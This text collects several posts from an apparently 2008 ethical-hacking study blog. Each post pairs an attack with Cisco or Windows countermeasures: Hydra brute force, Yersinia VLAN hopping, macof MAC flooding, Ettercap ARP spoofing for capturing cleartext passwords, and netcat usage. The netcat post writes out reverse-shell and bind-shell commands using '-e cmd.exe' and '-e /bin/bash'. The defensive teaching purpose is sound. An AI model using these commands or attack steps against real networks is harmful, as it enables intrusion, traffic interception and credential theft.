Next we select our target, port, and protocol type. We then click the next tab which is Passwords.

On this tab we select the output.txt file we created with Wyd earlier. We need to put in a username to use a cisco attack. We also need to change the tuning on the tuning tab to 4. After this we move to the start tab and start the attack.

After giving the attack some time you might just have a login to the device you are attacking.

I recommend knowing THC-Hydra quite well as this type of tool is extremely valuable to the ethical hacker. Most people don't configure devices securely and this tool will usually hack it wide open. I haven't shown the command line version of this tool but it is extremely powerful as well.

Countermeasures for Windows

To block this kind of Attack the best form of defense is an account lockout. This can be configured on most platforms pretty easily. To set up account lockout in windows you should use group policy and set the following parameters.

Microsoft is somewhat deceptive on this stating that this procedure will lockout the accounts. It will lock them out with the exception of the Administrator account. This piece of information will allow you to own most windows servers if the Administrator account is present. To stop this we use a tool called passprop.exe. This tool allows the administrator account to lock out like other accounts. You can download this tool here.

Countermeasures for Cisco

The countermeasures to block this kind of attack on Cisco platform consist of using AAA to setup the amount of tries you get for sign in.

We start by doing

Router(config)# username mynet privilege 15 password $3cr3tp@$$
Router(config)# aaa new-model
Router(config)# aaa local authentication attempts max-fail 3
Router(config)# aaa authentication login default local

This creates a user named mynet that locks out after 3 failed attempts. To unlock an account log in as a different user and issue the following.

Router(config)#clear aaa local user lockout mynet

We have now attacked with and defended against a Brute Force attack. Our systems are now more secure because of our penetration test. This goes to show that sometimes chaos can bring balance. This is a life lesson in itself.

Greased Lightbox - Update available (v0.17)

→←+-↻

Loading image

Click anywhere to cancel

Image unavailable

Destroying the LAN Part 3; The mysterious VLAN hopping attack

2008-07-15T14:15:00.014-04:00

In today's post we are going to talk about another layer 2 switching attack, the mysterious VLAN hopping attack. I call the attack mysterious because for a long time this type of attack was considered theoretical. We have a nice little tool to help us accomplish this attack and show that this attack is a real threat.

If you are a penetration tester/ethical hacker you should really become familiar with the tool we are going to talk about. This tool gives us new ability to simulate dangerous internal attacks that would be extremely disruptive to a LAN. I usually recommend that this type of pen test is done with the LAN administrator knowing full well that this attack will probably cause some major issues with the LAN. In other words after business hours.

The tool we are going to explore to today is called Yersinia. It is named after the bacteria that caused the black plague. If you understand the full potential of this tool you can see why it would be likened to the plague. This tool really gets down and dirty with layer 2. You can mess with spanning tree, CDP, DTP, HSRP 802.1q etc. If you would like to read more about this tool you can do so at http://www.yersinia.net/.

To execute this attack we are going to open Yersinia with the Ncurses GUI. The command to execute it in this mode is ./yersinia -I. For help on the different modes of Yersinia execute ./yersinia -h. You should get a window that looks like the following.

After executing Yersinia with the -I option you are presented with a screen that looks like the following:

Make sure that it shows the Ethernet interface you want to sniff traffic from. If it doesn't use the i button and it should allow you to select an interface. At this point you will need to wait a few minutes about 5 and if the switch is vulnerable you will start seeing DTP frames. If not that's it the attack is over. To see the VTP frame count you can hit F5.

After seeing a few DTP packets then we want to setup a trunk with the switch. To do this we hit g, choose DTP mode, X for attacks and 1 for trunking. You should see it display Dynamic Desirable in the screen. After it forms a trunk we should be able to see some traffic mostly broadcast. Then we press g again, choose 802.1q, hit x again and choose 2 for 802.1q arp poisoning. We then need to know a host that isn't alive in the VLAN, the VLAN number and the gateway of the VLAN we are hopping into. We enter this info and then we start seeing packets from the other VLAN.

This proves something Important, VLANS don't create security!!!!!!!!!

Countermeasures

The countermeasures for this attack are actually quite simple. The most important is to make sure that all ports on a switch that aren't connecting to other switches are hard coded as access ports. I use the following configuration to shore up host ports from most attacks.

3560(config-if)#switchport host

This configuration accomplishes a few things. First it turns on portfast and then it hard codes the port for access. This is good for stations connected to an end host because it enables rapid spanning tree and makes the network start faster if the station is rebooted. It also disables the trunk negotiation which we used in the beginning of our attack.

So now we have hopped vlans and then put in place security to stop this variation of the vlan hopping attack. So once again our network is in balance.

Greased Lightbox - Update available (v0.17)

→←+-↻

Loading image

Click anywhere to cancel

Image unavailable

Destroying the LAN Part 2; The Yin and Yang of Mac Flooding

2008-07-14T15:40:00.008-04:00

The attack vector we are going to examine today is mac address flooding. This is another attack that can actually break your network. Most networks recover pretty quickly from this type of attack but it can knock a switch completely offline for a short period of time.

The theory behind this type of attack is that most switches have a limited amount of memory for their CAM table. This means that under heavy load they start broadcasting all traffic to all ports. The mac flooding attack fills up the CAM table to the point that the switch can't add any more mac addresses to the table. This makes the switch start broadcasting all traffic to all ports thus allowing an attacker to sniff traffic that they would not normally be able to access.

The Attack tool we are examining today is Macof. Macof is a tool that can flood random mac addresses into a switches CAM table. This tool is part of the Dsniff set of tools and can be downloaded here.

To execute this kind of attack you need to start a packet sniffer such as Wireshark and then start Macof by doing macof -i eth0. This ensures that once the switch starts sending traffic your way you will be able to catch all of the traffic in your sniffer program. This is essentially an attack and wait strategy much like arp spoofing. If you don't crash the switch it will start flooding all the traffic that doesn't have an entry in the CAM table. Thus sending the traffic for the entire LAN/VLAN out all of the ports. This traffic is then captured by Wireshark which you already have open. At this point any unencrypted traffic is owned and you can use the filters in Wireshark to narrow down the type of traffic you are looking for.

Countermeasures
The countermeasures of this Attack at least from the Cisco world is a configuration option called port security. Port security allows a certain number of mac addressses to attach to a port and then after that number an action will occur. This action is one of three possible actions. They are restrict, protect, and shutdown.

Restrict increments a violation counter which alerts a network administrator.
Protect blocks any traffic from the new mac addresses.
Shutdown deactivates the port immediately and sends an SNMP trap notification.

Basically once this is configured the attack can be blocked automatically from the switch an example configuration for blocking this attack would be the following:

3550-B(config-if)#switchport port-security

3550-B(config-if)#switchport port-security maximum value 5

3550-B(config-if)#switchport port-security violation shutdown

3550-B(config-if)#switchport port-security mac-address aabb.ccdd.eeff

This configuration permits a total of 5 mac addresses then shuts down the port. These commands can allow many different variables for more information check here.

So once again we have protected layer two traffic from sniffing and brought our network back into balance. The best protection for traffic is always encryption but most network environments have legacy applications that must have traffic in the clear. The prime example of this is email and most printing functions.

Destroying the LAN; The Yin and Yang of ARP spoofing

2008-07-11T10:07:00.016-04:00

The attack vector I am examining in today's post is ARP Spoofing. Please be aware that this is a very destructive attack and can bring down an entire LAN.

The theory behind ARP spoofing is that since ARP replies are not verified an attacker can send a spoofed ARP reply to a victim machine, thereby poisoning its ARP cache. This type of attack can redirect traffic to any destination chosen by the attacker.

This type of attack is mainly used to sniff traffic in a switched network. It has also been used in other ways to redirect traffic such as the recent hacking of metasploit.com.

The Attack tool we are going to examine is Ettercap NG. Ettercap gives us the ability to choose a target for arp spoofing and then redirect the traffic to our mac address. Then we capture that traffic to look for information in clear text such as http, ftp, telnet, and pop3 usernames and passwords.

Ettercap works on Windows and Linux and has two different GUI options on Linux as well as a command line option. The full functionality of Ettercap is beyond the scope of this post as it can be used for Man in the Middle attacks of many different kinds.

The usage of Ettercap for Arp Spoofing is amazingly self explanatory for most users. Pick a sniffing method, scan the network for hosts. Add them as targets then choose Mitm and Arp Posioning. This attack is really great for getting cleartext usernames and passwords on a switched network. If you want more information on how to use Ettercap click here.

Countermeasures
To counter the Arp spoofing attack we are going to use a function that is embedded into Cisco 3560 Catalyst switches. This function is called Dynamic ARP inspection. This basically stops the ability of attackers to push the bogus arps to the other machines.

To quote Cisco "Dynamic ARP inspection determines the validity of an ARP packet based on valid IP-to-MAC address bindings stored in a trusted database, the DHCP snooping binding database."

To configure Dynamic ARP inspection you need to configure your switches with the following commands.

Cisco3560(config)#ip arp inspection vlan 100 or whatever number

On any port connected to another switch you must use the following command

Cisco3560(config-if)#ip arp inspection trust

To use this command DHCP snooping must be enabled or you have to setup an ACL that allows arp for certain devices. This can be configured like the following.

This example shows how to configure an ARP ACL called host2 on Switch A, to permit ARP packets from Host 2 (IP address 1.1.1.1 and MAC address 0001.0001.0001), to apply the ACL to VLAN 1, and to configure port 1 on Switch A as untrusted:

Switch(config)# arp access-list host2
Switch(config-arp-acl)# permit ip host 1.1.1.1 mac host 1.1.1
Switch(config-arp-acl)# exit
Switch(config)# ip arp inspection filter host2 vlan 1
Switch(config)# interface gigabitethernet0/1
Switch(config-if)# no ip arp inspection trust

For more info on Dynamic Arp Inspection Configuration click here

Once this configuration is in place the ARP spoofing attack doesn't function. So once again we have brought balance to the security of our information. This simple configuration stops one of the most dangerous internal attacks. These simple steps help secure the layer two infrastructure against attacks that could be devastating to an organization.

The Yin and Yang of NetCat

2008-07-10T15:22:00.020-04:00

Netcat is a great tool that works on Windows and Linux. It can do the following:

port redirection,
uploading and downloading of files
listening on a port of your choosing
simple chat
port scanning
backdoors

I am going to show some examples on how to use this tool.

Listening on a port is as easy as using the following command.

nc -lvvp 80

nc netcat
-l listen mode
-vv very verbose
-p port 80

Connecting to a port with netcat is great for banner grabbing. This can be done with the following commands

nc -vv 192.168.0.1 23
nc netcat
-vv very verbose
ip
port

Uploading a file uses the command as earlier just use Greater and Less Than.

nc -lv 4444 >netcat.txt
nc -v 192.168.0.198 <>

Sending a reverse shell

nc -v 192.168.0.198 4444 -e cmd.exe
nc -v 192.168.0.198 4444 -e /bin/bash

Listening with a command shell

nc -lv 4444 -e cmd.exe
nc -lv 4444 -e /bin/bash

Countermeasures

Preventing this type of tool can be done with antivirus, firewalls and IDS for the reverse shell. NetCat is a great tool for the ethical hacking arsenal.

First Post

2008-07-10T15:03:00.001-04:00

Ok, First Post.

I am setting this up as a personal information database for useful information relating to my CCIE and Ethical Hacking studies. Some of the tools and scripts might be useful if you are in IT. Each post will showcase a type of attack and the countermeasure. Most of this will be settings to change and scripts written to execute the attack along with pictures.

I will show the attack and then the countermeasure to bring it into balance. I am going to include pictures and show in great detail how to execute the attack and then counter it. Feel free to use anything I post, as the tools will be opensource and freely downloadable.

Thanks
HackThePlanet